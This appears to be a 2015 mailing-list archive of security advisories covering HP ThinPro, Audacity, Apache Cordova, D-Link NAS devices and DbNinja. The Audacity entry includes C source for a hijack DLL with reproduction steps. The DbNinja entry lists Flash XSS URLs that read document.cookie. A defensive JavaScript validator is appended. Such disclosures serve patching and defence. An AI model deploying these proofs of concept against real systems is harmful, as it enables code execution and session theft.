[security bulletin] HPSBHF03340 rev.1 - HP ThinPro Linux and HP Smart Zero Core running HP Easy Setup Wizard, Local Unauthorized Access, Elevation of Privilege

2015-05-28 Thread security-alert

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04692275
Version: 1

HPSBHF03340 rev.1 - HP ThinPro Linux and HP Smart Zero Core running HP Easy
Setup Wizard, Local Unauthorized Access, Elevation of Privilege

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2015-05-27
Last Updated: 2015-05-27

Potential Security Impact: Local unauthorized access, elevation of privilege

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP ThinPro Linux
and HP Smart Zero Core running HP Easy Setup Wizard. The vulnerability could
result in local unauthorized access and elevation of privilege on an HP thin
client device.

References:

CVE-2015-2124
SSRT102045

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP ThinPro Linux and HP Smart Zero Core. Following is the list of affected
versions:

HP ThinPro:

HP ThinPro Linux 5.1 (x86)
HP ThinPro Linux 5.0 (x86)
HP ThinPro Linux 4.4 (x86)
HP ThinPro Linux 4.3 (x86)
HP ThinPro Linux 4.2 (x86)
HP ThinPro Linux 4.1 (x86)

HP Smart Zero Core:

HP Smart Zero Core 4.4 (x86)
HP Smart Zero Core 4.4 (ARM)
HP Smart Zero Core 4.3 (x86)
HP Smart Zero Core 4.3 (ARM)

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference        Base Vector                     Base Score
  CVE-2015-2124    (AV:L/AC:L/Au:S/C:C/I:C/A:C)    6.8
===
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has released the following software updates to resolve the vulnerability.

Download the patch for the appropriate Operating System version from the
table:

Product Version
 Link to download Patch

HP ThinPro Linux 5.1 (x86)
 https://ftp.hp.com/pub/tcdebian/updates/5.1/service_packs/SecurityRollup2015-all-5.1-x86.xar

HP ThinPro Linux 5.0 (x86)
 https://ftp.hp.com/pub/tcdebian/updates/5.0/service_packs/SecurityRollup2015-all-5.0-x86.xar

HP ThinPro Linux 4.4 (x86)
 https://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/SecurityRollup2015-TP-4.4-x86.xar

HP ThinPro Linux 4.3 (x86)
 https://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/SecurityRollup2015-TP-4.3-x86.xar

HP ThinPro Linux 4.2 (x86)
 https://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/SecurityRollup2015-TP-4.2-x86.xar

HP ThinPro Linux 4.1 (x86)
 https://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/SecurityRollup2015-TP-4.1-x86.xar

HP Smart Zero Core 4.4 (x86)
 https://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/SecurityRollup2015-SZ-4.4-x86.xar

HP Smart Zero Core 4.4 (ARM)
 https://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/SecurityRollup2015-SZ-4.4-armel.xar

HP Smart Zero Core 4.3 (x86)
 https://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/SecurityRollup2015-SZ-4.3-x86.xar

HP Smart Zero Core 4.3 (ARM)
 https://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/SecurityRollup2015-SZ-4.3-armel.xar

HISTORY
Version:1 (rev.1) - 27 May 2015 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel.  For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2015 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP nor
its affiliates, subcontractors or suppliers will be liable for
incidental, special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages f

Audacity 2.0.5 contains Arbitrary DLL Injection Code Execution

2015-05-28 Thread mystyle_rahul
A local dll injection vulnerability has been discovered in the official 
Audacity 2.0.5.
Since the program is not specified with a fully qualified path name the program 
uses a fixed path to look for specific files or libraries. This path includes 
directories that may not be trusted or under user control. By placing a custom 
version of the file or library in the path, the program will load it before the 
legitimate version. This allows a local attacker to inject custom code that 
will be run with the privilege of the program or user executing the program. 
This attack can be leveraged remotely in some cases by placing the malicious 
file or library on a network share or extracted archive downloaded from a 
remote source. This can be done by tricking a user into running a hostile 
script from the local file system or a USB drive in some cases.


When a malicious DLL is created with one of the following names:
avformat-52.dll
avutil-50.dll
avcodec-52.dll
and placed in the directory of the installed Audacity, C:\Program Files 
(x86)\Audacity, then when Audacity is started by the legitimate user it 
will start the process and immediately close; in the meantime the code within the 
malicious DLL will be executed and can lead to total compromise of the system on 
which it is installed.

Vulnerability Information:
Class: DLL Hijacking
Impact: System access
Remotely Exploitable: Yes
Locally Exploitable: Yes

Vulnerable Software:
[+] Audacity

Vulnerable Version(s):
[+] v2.0.5

Vulnerable Libraries:
[+] avformat-52.dll
[+] avutil-50.dll
[+] avcodec-52.dll

Proof of Concept (PoC):
===
Manual steps to reproduce the local vulnerability ...
1. Compile dll and rename to avformat-52.dll , avutil-50.dll , avcodec-52.dll
2. Copy avformat-52.dll to C:\Program Files\Staff-FTP
3. Launch Audacity

PoC: Exploit 
#include <windows.h>
#include <stdlib.h>
 
/* Payload marker: launching calc shows the DLL was loaded; exit(0) then ends the host process. */
int alpdaemon()
{
  WinExec("calc", SW_SHOW);
  exit(0);
  return 0;
}
 
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  alpdaemon();
  return 0;
}


CVE-2015-1835: ...

2015-05-28 Thread Dirk-Willem van Gulik on behalf of Apache Cordova

CVE-2015-1835: Remote exploit of secondary configuration variables in 
   Apache Cordova on Android

Severity:  High

Vendor: The Apache Software Foundation

Versions Affected:
   Cordova Android up to 4.0.1 (3.7.2 excluded)

Description:

Android applications built with the Cordova framework that don't have 
explicit values set in Config.xml can have undefined configuration 
variables set by Intent.  This can cause unwanted dialogs appearing 
in applications and changes in the application behaviour that can 
include the app force-closing.

The latest release of Cordova Android entirely removes the ability 
of configuration parameters to be set by intents.  This change is 
an API change in the platform, and third-party plugins that use 
values set in the config.xml should make sure that they use the 
preferences API instead of relying on the Intent bundle, which 
can be manipulated in this case.

Upgrade path:

Developers who are concerned about this should rebuild their 
applications with either Cordova Android 4.0.2, or Cordova 3.7.4 
if they are unable to upgrade to Cordova 4.0.2. Developers should 
also make sure that variables that they wish to have protected 
are specified in their config.xml.

Credit:

This issue was discovered by Seven Shen of Trend Micro Mobile Threat Research 
Team


[SEARCH-LAB advisory] More than fifty vulnerabilities in D-Link NAS and NVR devices

2015-05-28 Thread Gergely Eberhardt
Overview

SEARCH-LAB performed an independent security assessment on four
different D-Link devices. The assessment has identified altogether 53
unique vulnerabilities in the latest firmware (dated 30-07-2014).
Several vulnerabilities can be abused by a remote attacker to execute
arbitrary code and gain full control over the devices. We list below
several of the problematic areas, where the most critical findings were
discovered:
- Authentication can be bypassed in several ways, allowing an attacker
to take full control over the device without the need to exploit any
programming or design bugs.
- We found a few half-baked security workarounds to fix earlier
vulnerabilities that introduced even more serious problems, leading to
command injection and the possibility to take full control over the device.
- Even though there were several security patches and workarounds in the
session management part of the code, we still found serious problems
there. It was still possible to perform unauthenticated file upload
to an arbitrarily chosen location, which also leads to the possibility
for an attacker to take full control over the device.
- Default users (root, nobody) can be used during authentication, and
the administrator cannot change the default (empty) password of these
users from the user interface.

Details and CVEs

For the specific details see our full report in [SL-ADV]. We suppose
that some of the vulnerabilities were discovered by other researchers
too, but we saw it reasonable and useful to publish our findings in such
a comprehensive study. Naturally in the report we tried to find and
reference all of the previous publications that may have found the same
problems.
We obtained the following CVE numbers for the above described
vulnerabilities:
- CVE-2014-7858: Check_login bypass vulnerability in DNR-326
- CVE-2014-7859: Buffer overflow in login_mgr.cgi and in file_sharing.cgi
- CVE-2014-7860: Unauthenticated photo publish
We also reported two other authentication bypass vulnerabilities
(CVE-2014-7857) to D-Link; but since these problems have not been
addressed correctly yet, we will only publish them after 22/06/2015.

Affected devices

Main targeted devices during the assessment:
- DNS-320, Revision A: 2.03, 13/05/2013
- DNS-320L, 1.03b04, 11/11/2013
- DNS-327L, 1.02, 02/07/2014
- DNR-326, 1.40b03, 7/19/2013

Other devices were influenced by one or more vulnerabilities:
- DNS-320B, 1,02b01, 23/04/2014
- DNS-345, 1.03b06, 30/07/2014
- DNS-325, 1.05b03, 30/12/2013
- DNS-322L, 2.00b07

See [SL-ADV] for the complete vulnerability matrix at the time of the
assessment. We note that other devices may also be vulnerable.

Solution

Most of the vulnerabilities were fixed in:
- DNS-320L 1.04.B12
- DNS-327L 1.03.B04

Some of the vulnerabilities were fixed in:
- DNR-326 2.10.B03
- DNR-322L 2.10.B03

Besides installing the patches, where available, we highly recommend not
to expose the web interface of the DNS and DNR devices to the internet.
Since the devices use the UPnP feature, you should disable it in the router.

Credits
---
These vulnerabilities were discovered and researched by Gergely
Eberhardt (@ebux25) from SEARCH-LAB Ltd. (www.search-lab.hu)

References
--
[SL-ADV] Security Advisory, MULTIPLE VULNERABILITIES IN D-LINK DNS-320,
320L, 327L AND DNR-326 DEVICES,
http://www.search-lab.hu/media/D-Link_Security_advisory_3_0_public.pdf
[DNS-320] http://support.dlink.com/ProductInfo.aspx?m=DNS-320
[DNS-320L] http://support.dlink.com/ProductInfo.aspx?m=DNS-320L
[DNS-327L] http://support.dlink.com/ProductInfo.aspx?m=DNS-327L
[DNS-345] http://support.dlink.com/ProductInfo.aspx?m=DNS-345
[DNS-325] http://support.dlink.com/ProductInfo.aspx?m=DNS-325
[DNR-326] http://support.dlink.com/ProductInfo.aspx?m=DNR-326
[DNR-322L] http://support.dlink.com/ProductInfo.aspx?m=DNR-322L



DbNinja 3.2.6 Flash XSS Vulnerabilities

2015-05-28 Thread apparitionsec
# Exploit Title: DbNinja Flash XSS Exploit
# Google Dork: intitle: Flash XSS
# Date: May 27, 2015
# Exploit Author: John Page (hyp3rlinx)
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: www.dbninja.com
# Software Link: www.dbninja.com
# Version: 3.2.6
# Tested on: Windows 7
# Category: Flash XSS
# CVE : NA


Source:
http://hyp3rlinx.altervista.org/advisories/AS-DBNINJA0527.txt


Product:
DbNinja is a web based application for MySQL database administration.


Advisory Information:

DbNinja multiple Flash based XSS vulnerabilities


Vulnerability Details:
=
The DbNinja Flash uploader component contains 2 SWF files that use Flash 
'ExternalInterface' API to call Javascript functions.
These SWFs can be exploited by supplying malicious code as parameters to those 
functions from the URL. The text value "Copy to Clipboard" can also be changed 
using the "buttonText" parameter.



Exploit code(s):
===

1- 
http://localhost/dbninja/dbninja/js/lib/uploader.swf?selectCallback=alert(document.cookie)

2- 
http://localhost/dbninja/dbninja/js/lib/clipboard.swf?buttonText=DbNinja%20Login&dataSourceFunc=alert(document.cookie)

3- 
http://localhost/dbninja/dbninja/js/lib/clipboard.swf?completeCallback=alert(document.cookie)
 



Disclosure Timeline:
=

May 23, 2015: Vendor Notification
May 27, 2015: Public Disclosure



Severity Level:
=
High



Description:
==

Request Method(s):
[+] GET

Vulnerable Product:
[+] DBNinja 3.2.6

Vulnerable Parameter(s):
[+] selectCallback, dataSourceFunc & completeCallback

Affected Area(s):
[+] uploader.swf, clipboard.swf

===

(hyp3rlinx)
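The input validation the two SWFs lack, shown as an added example that is not DbNinja's code (JavaScript stands in for the ActionScript the SWFs would need): a URL-supplied callback name such as selectCallback, dataSourceFunc or completeCallback is accepted only as a plain, optionally dotted, identifier, and optionally only if it is on the page's allow-list, before it is handed to ExternalInterface.call(). The parseQuery helper, the allow-list names and the sample callback names are assumptions.

```javascript
// Added example (not DbNinja's code). The SWFs pass a URL-supplied callback
// name straight to ExternalInterface.call(), which evaluates it as JavaScript,
// so "alert(document.cookie)" runs. The hardened resolver accepts only a
// dotted identifier, optionally restricted to an allow-list of page callbacks.

// A JavaScript identifier, optionally dotted (e.g. "DbNinja.onUploadSelect").
const CALLBACK_NAME = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;

// Vulnerable behaviour: the raw parameter is what gets evaluated.
function resolveCallbackVulnerable(name) {
  return name;
}

// Hardened: a null result means "do not call anything".
function resolveCallbackHardened(name, allowList) {
  if (typeof name !== "string" || !CALLBACK_NAME.test(name)) return null;
  if (Array.isArray(allowList) && !allowList.includes(name)) return null;
  return name;
}

// Minimal FlashVars-style query parser (assumption: the SWFs read plain
// key=value pairs from the query string). A pair with malformed
// percent-encoding is skipped instead of throwing.
function parseQuery(url) {
  const params = {};
  const q = url.indexOf("?");
  if (q === -1) return params;
  for (const pair of url.slice(q + 1).split("&")) {
    const eq = pair.indexOf("=");
    if (eq <= 0) continue;
    try {
      params[decodeURIComponent(pair.slice(0, eq))] =
        decodeURIComponent(pair.slice(eq + 1).replace(/\+/g, " "));
    } catch (e) { /* bad percent-encoding: skip the pair */ }
  }
  return params;
}

// Classify the three parameters the advisory names for a given SWF URL.
function auditCallbackParams(url, allowList) {
  const params = parseQuery(url);
  const verdict = {};
  for (const p of ["selectCallback", "dataSourceFunc", "completeCallback"]) {
    if (!(p in params)) continue;
    verdict[p] =
      resolveCallbackHardened(params[p], allowList) === null ? "rejected" : "accepted";
  }
  return verdict;
}
```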

